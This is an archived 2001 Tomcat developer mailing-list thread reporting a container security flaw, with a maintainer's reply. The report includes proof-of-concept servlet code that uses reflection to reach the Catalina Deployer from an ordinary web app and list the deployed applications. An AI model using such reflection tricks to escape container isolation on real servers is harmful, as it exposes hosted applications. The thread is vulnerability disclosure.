You are viewing a plain text version of this content. The canonical link for it is here.

Posted to dev@tomcat.apache.org by Fabien Le Floc'h <fl...@operamail.com> on 2001/05/11 21:05:42 UTC

container security issue

I apologize for repeating this, but I did not yet get any answer.

I wrote a servlet in a classic WAR file at an arbitrary location and NOT in the org.apache.catalina package. From this servlet, I was able to access a method on the Deployer, i.e. I was able to access anything public in any Container "from outside". This is only working by using reflection.

Here is the code (not clean, sorry about that) for the doGet method:

	response.setContentType("text/plain");
	PrintWriter writer = response.getWriter();

	Object theWrapper = (Object) this.getServletConfig();
	try {
	    Method method = theWrapper.getClass().getMethod("getParent", new Class[] {});

	    Object theContext = method.invoke(theWrapper, new Object[] {});
	    method = theContext.getClass().getMethod("getParent", new Class[] {});
	    Object theDeployer = method.invoke(theContext, new Object[] {});
	    method = theDeployer.getClass().getMethod("findDeployedApps", new Class[] {});
	    Object deployedApps = method.invoke(theDeployer, new Object[] {});
	    String[] apps = (String[]) deployedApps;
	    writer.println("detected apps:");
	    for (int i=0; i<apps.length;i++) {
		writer.println(apps[i]);
	    }
	} catch (Exception e) {
	    e.printStackTrace();
	    writer.println("An exception occured when invoking the method, "+e.getMessage());
	}
	writer.flush();
	writer.close();



Conclusion: there is a security issue. We don't need the prerequisite to access Catalina core classes. I am really wondering how it would be possible to fix this security problem without an important redesign.


Regards,


Fabien

P.S.: should I include a WAR file?

Re: container security issue

Posted by "Craig R. McClanahan" <cr...@apache.org>.


On 11 May 2001, Fabien Le Floc'h wrote:

> I apologize for repeating this, but I did not yet get any answer.
> 
> I wrote a servlet in a classic WAR file at an arbitrary location and
> NOT in the org.apache.catalina package. From this servlet, I was able
> to access a method on the Deployer, i.e. I was able to access anything
> public in any Container "from outside". This is only working by using
> reflection.
> 

I'm investigating this one (and another reported security issue) right
now.  I've got an equivalent test case, so I won't need a war file.

Craig

> Here is the code (not clean, sorry about that) for the doGet method:
> 
> 	response.setContentType("text/plain");
> 	PrintWriter writer = response.getWriter();
> 
> 	Object theWrapper = (Object) this.getServletConfig();
> 	try {
> 	    Method method = theWrapper.getClass().getMethod("getParent", new Class[] {});
> 
> 	    Object theContext = method.invoke(theWrapper, new Object[] {});
> 	    method = theContext.getClass().getMethod("getParent", new Class[] {});
> 	    Object theDeployer = method.invoke(theContext, new Object[] {});
> 	    method = theDeployer.getClass().getMethod("findDeployedApps", new Class[] {});
> 	    Object deployedApps = method.invoke(theDeployer, new Object[] {});
> 	    String[] apps = (String[]) deployedApps;
> 	    writer.println("detected apps:");
> 	    for (int i=0; i<apps.length;i++) {
> 		writer.println(apps[i]);
> 	    }
> 	} catch (Exception e) {
> 	    e.printStackTrace();
> 	    writer.println("An exception occured when invoking the method, "+e.getMessage());
> 	}
> 	writer.flush();
> 	writer.close();
> 
> 
> 
> Conclusion: there is a security issue. We don't need the prerequisite to access Catalina core classes. I am really wondering how it would be possible to fix this security problem without an important redesign.
> 
> 
> Regards,
> 
> 
> Fabien
> 
> P.S.: should I include a WAR file?
> 
>